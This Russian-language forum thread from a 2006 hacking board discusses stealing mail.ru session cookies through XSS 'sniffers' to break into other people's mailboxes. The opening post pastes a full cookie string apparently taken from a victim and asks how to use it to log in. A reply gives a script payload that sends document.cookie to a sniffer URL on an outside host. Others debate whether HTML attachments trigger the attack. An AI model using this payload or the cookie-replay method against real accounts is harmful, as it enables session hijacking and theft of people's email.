Снифф для mail.ru бесполезен? =(

Discussion in 'Уязвимости Mail-сервисов' started by Ponchik, 29 Apr 2006.

  1. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Всем привет! Вот у меня есть QUERY: MailUser=1; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAABAAAAAAAAAAAAABMLxwcA; mrcu=5FEB43F6AE6665B689FC0BA8F857; answer431-3=1; answer431-8=1; answer431-4=1; answer431-5=1; b15719=undefined; vote435=1; answer435-5=1; vote440=1; answer440-1=1; p=uYMIAEqnQgAA; p_sid=2a1c2b25d56a3c9538586f8c306d5e77; searchuid=7478091140342773; c56=c1xYRAAAAAD5EwEAAAAA; c8=5sVTRAAAAAD9SgEAAAAAAPuCAQAAAAAA
    Это из почты mail.ru, но ничего не получается =( Может что-то из этого ненужно забивать в куки, а некоторые значения вобще удалить? У меня ничё не получается :(
     
  2. JazzzSummerMan

    Joined:
    7 Apr 2004
    Messages:
    374
    Likes Received:
    18
    Reputations:
    14
    здесь нет главного параметра, единственного обязательного идентификатора, Mpopl вроде называется
     
    1 person likes this.
  3. Ponchik

    Ponchik Хлебо-булочное изделие

    Joined:
    30 Aug 2005
    Messages:
    687
    Likes Received:
    807
    Reputations:
    311
    Ах блин! Он тогда в почту не защёл, блин! А я уже противоялие дал =(((( Ладно, буду ещё кого-нибудь юзать, пасибо.
     
  4. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,019
    Likes Received:
    770
    Reputations:
    97
    А что ты отправлял на почту, что на сниффере это отобразилось? Какой код?
     
  5. gLAnce

    gLAnce Elder - Старейшина

    Joined:
    24 Apr 2006
    Messages:
    19
    Likes Received:
    19
    Reputations:
    14
    наверно прикрипленный html файл с обычным
    <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
     
    1 person likes this.
  6. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,019
    Likes Received:
    770
    Reputations:
    97
    Хочешь сказать, что если просто прикрепить хтмл файл к письму с таким скриптом, то хсс прокатит? Я думаю, что нет... Нужно письмо в хтмл формате отсылать... Да и к тому-же этот метод, что приведёт выше не прокатывает уже, как пол года или больше...
     
  7. gLAnce

    gLAnce Elder - Старейшина

    Joined:
    24 Apr 2006
    Messages:
    19
    Likes Received:
    19
    Reputations:
    14
    нет нет нет, фишка в том что чел отсылает прикрепленный html файл, а юзер открывает этот прикрепленный файл.....
    а так конечно не пашет =)
     
  8. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,019
    Likes Received:
    770
    Reputations:
    97
    Так прикреплённый файл-то сначала скачать надо думаю и он срабатывать будит на машине жертвы в автономном режиме... Ну да ладно...
     
  9. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Че-то я тоже не особо понял, к чему этот html файл... Явно не так дело было!=)
     
  10. gLAnce

    gLAnce Elder - Старейшина

    Joined:
    24 Apr 2006
    Messages:
    19
    Likes Received:
    19
    Reputations:
    14
    не ну там можно скачать а можно открыть..
     
  11. dinar_007

    dinar_007 Мадемуазель

    Joined:
    18 Jan 2005
    Messages:
    1,019
    Likes Received:
    770
    Reputations:
    97
    А разницы нет... Если просто открыть, то он всё-равно перед этим скачается временным файлом, а потом откроется...
     
  12. olen

    olen New Member

    Joined:
    8 Mar 2006
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    С етово я понял чо сниферить мейл.ру невыгодно ..
    Мож ктото скажет реально на каких почтовых серверах прокатит ето ??
     
  13. bxN5

    bxN5 Elder - Старейшина

    Joined:
    8 Jan 2006
    Messages:
    687
    Likes Received:
    138
    Reputations:
    32
    На известных почтовых службах етот баг (если он появляется)сразу же прикрывают:)
     
  14. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    Че за бред?! Если хочешь куки юзверя... Нужно чтоб этот код выполнялся на странице "БРАУЗЕРA" http://win.mail.ru/cgi-bin/readmsg... А не в отдельном файле, которое находиться не на сервере а на твоем компе...
    document.cookie - Передает куки данного домена... Короче думаю понял )
     
  15. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    Пробовал отсылать картинку снифер! всерн не получаеться! Походу на mail.ru снифер не прокатует...
     
  16. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    ээээ.вроде если приклепляешь файл хтмл(и больше ничего, вроде) и открываешь в браузере сою почту, то он, вроде, а втоматически его открывает ввиде страницы прям в самом письме, пробовать надо, да ещё надо отправлять не в виде текста) вот тогда должно всё прокатить, но может и не прокатить, так ка он всё содержимое читает и показывает маленькую картинку с предупреждением